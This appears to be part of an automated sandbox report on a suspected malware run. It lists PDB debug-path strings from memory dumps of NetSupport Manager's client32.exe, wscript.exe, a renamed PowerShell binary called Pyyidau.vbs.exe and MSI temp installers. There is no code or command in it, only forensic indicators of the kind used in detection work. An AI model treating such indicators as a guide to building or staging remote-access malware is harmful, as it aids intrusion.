                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\pciinv\Release_unicode\pciinv.pdb@ source: client32.exe, 00000026.00000002.2714876626.000000006A0B0000.00000002.00000001.01000000.00000023.sdmp, client32.exe, 00000028.00000002.2769152495.000000006C860000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: srvcli.pdb4; source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: DisableGeolocationEnableStopClientpcicl32.pdbSSLDefCertrootcert.pemSSLCertDirRootCertsshareFilecic/setup.msicic/setup.execic/delta.zipCICshareVershareTypeInstalledBytracerecvtracesendNoAckWhenInRoomlimitcolorbitsWinHttpWiredNetworkSpeedWebSocketSSLOnlySSLDisconnectTimeoutSilentImageFilecic_lock_image.jpgImpersonateCurrentUserdetected TS feature source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.dr
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\pciinv\Release_unicode\pciinv.pdb( source: client32.exe, 00000026.00000002.2708076762.0000000004E90000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msimg32.pdbr$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msimg32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release\pcihooks.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000002.2770498000.000000006F91A000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\client32\release_unicode\PCICL32.pdb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.dr
                                Source: Binary string: wUxTheme.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: cscapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mpr.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: d3d11.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dbghelp.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\StoreInvDll\Release\StoreInvDll.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2714100665.0000000069E8B000.00000002.00000001.01000000.00000024.sdmp, client32.exe, 00000028.00000002.2770240444.000000006F8EB000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: WindowsCodecs.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wgdi32full.pdb source: client32.exe, 00000026.00000003.2696801013.0000000007680000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: sechost.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\DLL\wkernel32.pdb source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\PCICTL.pdb source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: wmiclnt.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: propsys.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dxgi.pdbY source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: fastprox.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wbemsvc.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: powrprof.pdbV$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msctf.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: linkinfo.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernel32.pdbtem32\wkernel32.pdbNetSupport Manager\symbols\DLL\wkernel32.pdbMI source: client32.exe, 00000026.00000002.2707856987.0000000004E5C000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: gwkernelbase.pdb source: client32.exe, 00000026.00000003.2700024684.0000000004E62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdbk source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: linkinfo.pdb ; source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release\pcihooks.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: netapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdb source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: bcryptprimitives.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Amsi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdbp source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: jE:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\SysWOW64\ntdll.dllernel32.pdbdbm source: client32.exe, 00000026.00000002.2711261491.000000000713C000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: dxgi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wuser32.pdb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\system32\wkernelbase.pdbO source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winsta.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: bcrypt.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wbemcomn.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: "Physical Memory"tem32\wkernelbase.pdb source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpJD source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wrpcrt4.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wbemcomn.pdbB$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcp100.i386.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb` source: client32.exe, 00000026.00000002.2713338524.0000000069A41000.00000020.00000001.01000000.00000025.sdmp
                                Source: Binary string: CLBCatQ.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernelbase.pdb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700024684.0000000004E62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: shlwapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: TextShaping.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: d3d12.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: NETSUPPORT LTD.NetSupport Ltd.url.pdb.dllpreprocessing %s source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.dr
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbhGR source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\cryptpak\Release\CryptPak.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000002.2769411923.000000006CBDE000.00000002.00000001.01000000.0000001A.sdmp
                                Source: Binary string: riched20.pdbx$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbE2G source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: adsldpc.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dhcpcsvc.pdb\$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: srvcli.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbpdblient32.pdbro source: client32.exe, 00000026.00000002.2707856987.0000000004E5C000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\pciinv\Release_unicode\pciinv.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2708076762.0000000004E90000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2714876626.000000006A0B0000.00000002.00000001.01000000.00000023.sdmp, client32.exe, 00000028.00000002.2769152495.000000006C860000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdb source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: profapi.pdb.; source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: iphlpapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdbUGP source: pcicfgui_client.exe, 00000024.00000002.2673326583.00000000026C0000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 00000028.00000003.2750993608.0000000007200000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2801948506.0000000008B90000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Pyyidau.vbs.exe, 00000003.00000002.1836537031.0000000008360000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: iphlpapi.pdb`$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000023.00000000.2645950640.0000000000732000.00000002.00000001.01000000.00000014.sdmp, client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2701499634.0000000004EEA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000000.2666385181.0000000000732000.00000002.00000001.01000000.00000014.sdmp, client32.exe, 00000026.00000002.2702240534.0000000000732000.00000002.00000001.01000000.00000014.sdmp, client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp, client32.exe, 00000028.00000000.2728490909.0000000000732000.00000002.00000001.01000000.00000014.sdmp, client32.exe, 00000028.00000002.2757688060.0000000000732000.00000002.00000001.01000000.00000014.sdmp, client32.exe, 0000002D.00000000.2778639496.0000000000732000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdb\*D{ source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\dll\wkernelbase.pdbG source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\Release_unicode\PCICFGUI.pdb source: pcicfgui_client.exe, 00000024.00000000.2661196429.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, pcicfgui_client.exe, 00000024.00000002.2673004138.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, pcicfgui_client.exe, 00000025.00000002.2666174324.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: wkernel32.pdbbJdSo@ source: client32.exe, 00000026.00000002.2711261491.000000000713C000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: userenv.pdb_ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: nsi.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wimm32.pdbi source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Kernel.Appcore.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\StoreInvDll\Release\StoreInvDll.pdb source: client32.exe, 00000026.00000002.2714100665.0000000069E8B000.00000002.00000001.01000000.00000024.sdmp, client32.exe, 00000028.00000002.2770240444.000000006F8EB000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: msls31.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: secur32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: powershell.pdb source: Pyyidau.vbs.exe, 00000003.00000000.1717706981.0000000000271000.00000020.00000001.01000000.00000005.sdmp
                                Source: Binary string: \??\C:\Windows\system32\wkernel32.pdb] source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: netutils.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: tapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wrpcrt4.pdbx source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdbb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: npciinv.pdbd source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: shlwapi.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2713338524.0000000069A41000.00000020.00000001.01000000.00000025.sdmp, client32.exe, 00000028.00000002.2766685456.000000006B361000.00000020.00000001.01000000.00000025.sdmp
                                Source: Binary string: wwin32u.pdbb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: shcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: riched20.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\pciinv.pdb G source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: oleaut32.pdb3 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: sechost.pdb9 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wgdi32.pdb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Amsi.pdb5 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpOD source: MSI2BE4.tmp, 0000001E.00000000.2548654979.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: cryptsp.pdbZ$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dnsapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: userenv.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wimm32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wwin32u.pdb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: setupapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wgdi32.pdbb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winhttp.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dxdiagn.pdbn$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: devobj.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: gdiplus.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: rtutils.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: profapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dhcpcsvc6.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: opciinvclient32.pdbwkernel32.pdb\Program Files (x86)\NetSupport\NetSupport Manager\Support ManagerD source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: |E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbpdblient32.pdb@ source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: WLDP.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System32\wkernel32.pdbG source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Pyyidau.vbs.exe, 00000003.00000002.1836537031.0000000008360000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: setupapi.pdb5 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msxml6.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: version.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbp source: MSI264F.tmp, 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534398483.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI51C1.tmp, 00000022.00000002.2658247472.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: dbgcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: riched32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdb source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wintrust.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ws2_32.pdb/ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System32\wkernel32.pdb2 source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Kernel.Appcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb( source: client32.exe, 00000026.00000003.2701499634.0000000004EEA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: psapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernelbase.pdb( source: client32.exe, 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700024684.0000000004E62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\dll\wkernelbase.pdb1} source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wtsapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
